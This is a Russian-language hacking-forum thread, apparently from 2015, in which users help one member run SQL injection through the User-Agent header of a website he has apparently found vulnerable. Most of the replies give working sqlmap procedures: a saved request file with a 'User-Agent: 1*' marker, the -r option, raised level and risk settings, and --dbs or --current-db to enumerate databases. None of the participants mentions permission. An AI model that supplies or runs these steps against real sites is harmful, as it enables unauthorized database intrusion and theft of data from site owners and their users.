Просмотр полной версии : Sql in User-agent
Octavian
25.09.2015, 19:36
Ребят как провесть такую инекцыю в скулмап а то он параметр усер агент непроверяет как ему подсказать а точнее какая команда?
http://incomas.md/23.jpg
BabaDook
25.09.2015, 20:53
слепая походу.Лучше sqlmap у передай это дело
Octavian
25.09.2015, 20:59
BabaDook said:
↑ (https://antichat.live/posts/3895092/)
слепая походу.Лучше sqlmap у передай это дело
он непроверяет параметр усер агент нужна какая нибудь команда типо пост инекцыии --data"=.." -p "user-agent:" чтота такое но так нехочет
Octavian
25.09.2015, 21:04
скулмап пишет тмпо параметр referer: not injectable а остальные параметры он непроверяет
Да есть там опция --user-agentно я делаю так
1)Создаешь текстовый файл 1.txt
2)туда вставляешь твой текст от GET до Accept: */*
3)вместо твоей скули пишешь 1* в поле юзер агента только не затри пробел получится
User-Agent: 1*
4)Скулимапу скармливаешь с параметром -r "путь до файла 1.txt"
Octavian
25.09.2015, 21:46
grimnir said:
↑ (https://antichat.live/posts/3895108/)
Да есть там опция
--user-agent
но я делаю так
1)Создаешь текстовый файл 1.txt
2)туда вставляешь твой текст от GET до Accept: */*
3)вместо твоей скули пишешь 1* в поле юзер агента только не затри пробел получится
User-Agent: 1*
4)Скулимапу скармливаешь с параметром -r "путь до файла 1.txt"
--url="http://site/index.php" --risk=3 --level=3 -r "C:\Users\братка\Desktop\1.txt" --dbs
ошибка
option '-r' is incompatible with option '-u' ('--url')
python.exe sqlmap.py -r "C:\1.txt" --eta --random-agent --threads=10 --level=5 --current-db
Octavian
25.09.2015, 23:37
ехх неполучилось (
grimnir said:
↑ (https://antichat.live/posts/3895123/)
python.exe sqlmap.py -r "C:\1.txt" --eta --random-agent --threads=10 --level=5 --current-db
рандом агент для скули в юзер агенте? укажите параметр --user-agent="Mozilla blabla*" без всякой даты и т. д.
yarbabin said:
↑ (https://antichat.live/posts/3895279/)
рандом агент для скули в юзер агенте? укажите параметр --user-agent="Mozilla blabla*" без всякой даты и т. д.
О точно,не то написал ,благодарю за внимательность
BabaDook
27.09.2015, 00:55
yarbabin said:
↑ (https://antichat.live/posts/3895279/)
рандом агент для скули в юзер агенте? укажите параметр --user-agent="Mozilla blabla*" без всякой даты и т. д.
а если хедар указать. юзер агент заголовок же
Octavian
27.09.2015, 01:49
BabaDook said:
↑ (https://antichat.live/posts/3895541/)
а если хедар указать. юзер агент заголовок же
DAVAITE TZELAIU KOMANDU?
BabaDook said:
↑ (https://antichat.live/posts/3895541/)
а если хедар указать. юзер агент заголовок же
надо смотреть, что в приоритете выше. собственные заголовки или параметры. вероятно, что header тоже пройдет
Octavian said:
↑ (https://antichat.live/posts/3895548/)
DAVAITE TZELAIU KOMANDU?
вот так сделай,гарантировано будет раскручивать там где надо
1)Создаешь текстовый файл 1.txt
2)туда вставляешь твой текст от GET до Accept: */*
3)вместо твоей скули пишешь 1* в поле юзер агента только не затри пробел получится
User-Agent: 1*
4)Скулимапу скармливаешь с параметром -r "путь до файла 1.txt"
Octavian
27.09.2015, 21:06
grimnir said:
↑ (https://antichat.live/posts/3895752/)
вот так сделай,гарантировано будет раскручивать там где надо
1)Создаешь текстовый файл 1.txt
2)туда вставляешь твой текст от GET до Accept: */*
3)вместо твоей скули пишешь 1* в поле юзер агента только не затри пробел получится
User-Agent: 1*
4)Скулимапу скармливаешь с параметром -r "путь до файла 1.txt"
пробовал неполучилось
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot